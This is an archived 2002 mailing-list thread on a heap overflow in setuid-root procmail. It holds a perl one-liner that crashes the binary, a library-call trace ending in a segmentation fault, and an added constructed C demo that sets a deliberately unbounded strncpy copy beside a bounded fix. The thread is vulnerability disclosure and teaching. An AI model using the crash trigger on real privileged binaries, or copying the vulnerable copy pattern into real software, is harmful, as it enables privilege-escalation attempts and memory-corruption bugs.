I believe we (one of our researchers "dvdman") were messing with this a few months back ... we never finished up our research ... here's what I found in an old strace log...

-KF

malloc(86) = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096) = 0x0805e0c4
strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setuid(506) = 0
setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
malloc(81) = 0x0805e120
memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0) = 2
memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0) = 17
memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
write(2, "procmail: Exceeded LINEBUF\n", 27) = 27
strchr("PROCMAIL_OVERFLOW=yes", '=') = "=yes"
strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15
strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

-KF

SpaceWalker wrote:
>$ procmail -v
>procmail v3.15.1 2001/01/08
>$ procmail `perl -e '{print "A"x10240}'`=A
>wait indefinitely
>Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.
>
>On Wed, 19 Jun 2002 02:38:08 +0200
>flatline <flatlineat_private> wrote:
>
>>hi,
>>
>>i found a heap overflow in procmail (up until latest) some time ago.
>>
>>flatline@intra:/usr/bin$ ls -la procmail
>>-rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail*
>>flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
>>procmail: Exceeded LINEBUF
>>Segmentation fault
>>flatline@intra:/usr/bin$
>>
>>at first it seemed to properly drop privs before segging, but not too long
>>ago i managed to make it crash while it still had euid 0.
>>segfaults have been seen on red hat/slackware linux and bsd variants.
>>successful exploitation has not been verified.
>>
>>/ flatline
>>
>>greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone
>>who felt left out.
>>
>
>
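Added illustration for readers of this archived thread; it is constructed here and is not procmail source, nor code from KF, SpaceWalker or flatline. The trace above shows strncpy() called with a count of 10000 into the same buffer that an earlier memmove() read 82 bytes from, and the "Exceeded LINEBUF" message written only afterwards. The program below models that pattern with a fixed-size heap line buffer and a neighbouring heap object, shows the copy bounded by the argument rather than by the buffer clobbering the neighbour, and puts a destination-bounded copy next to it that rejects the oversized "AAAA...=A" argument before writing. LINEBUF (2048), the 8-byte canary standing in for the neighbouring object, and all function names are assumptions for the demo; procmail's real buffer size and heap layout are not on the page.

```c
/* Constructed demo: count-bounded strncpy() into a heap line buffer versus a
 * destination-bounded copy. Not procmail code; sizes and names are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINEBUF   2048   /* assumed line-buffer size (procmail's is not on the page) */
#define COPY_LEN  10000  /* the strncpy() count visible in the posted trace   */
#define REGION    (LINEBUF + COPY_LEN)  /* big enough that the demo's writes stay in-bounds */

/* Eight canary bytes standing in for whatever the allocator placed right
 * after the line buffer (another string, pointers, chunk metadata). */
static const unsigned char CANARY[8] = "CANARY!";   /* 7 chars + NUL */

/* One heap region modelling two adjacent objects:
 * [0, LINEBUF) is the line buffer, [LINEBUF, LINEBUF+8) is the neighbour. */
unsigned char *make_region(void) {
    unsigned char *r = calloc(REGION, 1);
    if (!r) abort();
    memcpy(r + LINEBUF, CANARY, sizeof CANARY);
    return r;
}

/* 1 if the neighbouring object still holds the canary, 0 if it was overwritten. */
int neighbour_intact(const unsigned char *r) {
    return memcmp(r + LINEBUF, CANARY, sizeof CANARY) == 0;
}

/* Build the "AAAA...=A" style argument from the thread: n_as 'A's, then "=A". */
char *make_argument(size_t n_as) {
    char *a = malloc(n_as + 3);
    if (!a) abort();
    memset(a, 'A', n_as);
    memcpy(a + n_as, "=A", 3);          /* copies the terminating NUL too */
    return a;
}

/* Vulnerable pattern: the count caps the copy at 10000 bytes regardless of the
 * destination size, so a long argument runs past LINEBUF into the neighbour. */
void vulnerable_copy(unsigned char *r, const char *arg) {
    strncpy((char *)r, arg, COPY_LEN);
}

/* Length of s, never reading more than max bytes (portable strnlen). */
static size_t bounded_len(const char *s, size_t max) {
    size_t i = 0;
    while (i < max && s[i] != '\0')
        i++;
    return i;
}

/* Hardened copy: measure against the destination first and refuse anything
 * that does not fit, so the error path is taken before any byte is written.
 * Returns 0 on success, -1 if the argument was rejected. */
int safe_copy(unsigned char *r, const char *arg) {
    size_t len = bounded_len(arg, LINEBUF);
    if (len >= LINEBUF) {               /* no room for the NUL either */
        fputs("Exceeded LINEBUF\n", stderr);
        return -1;
    }
    memcpy(r, arg, len + 1);
    return 0;
}

int main(void) {
    char *arg = make_argument(10240);   /* same length as perl's "A"x10240, plus "=A" */
    unsigned char *r1 = make_region();
    unsigned char *r2 = make_region();

    vulnerable_copy(r1, arg);
    printf("strncpy(..., %d): neighbour %s\n", COPY_LEN,
           neighbour_intact(r1) ? "intact" : "CLOBBERED");

    int rc = safe_copy(r2, arg);
    printf("bounded copy: rc=%d, neighbour %s\n", rc,
           neighbour_intact(r2) ? "intact" : "CLOBBERED");

    free(arg);
    free(r1);
    free(r2);
    return 0;
}
```

The demo keeps both "objects" inside one calloc'd region so the overrun is observable without relying on a particular allocator's chunk placement; on a real heap the bytes after the line buffer are whatever malloc put there, which is why the crash in the trace lands later, in an unrelated strncmp() over the environment, rather than at the strncpy() itself.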
This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 11:16:31 PDT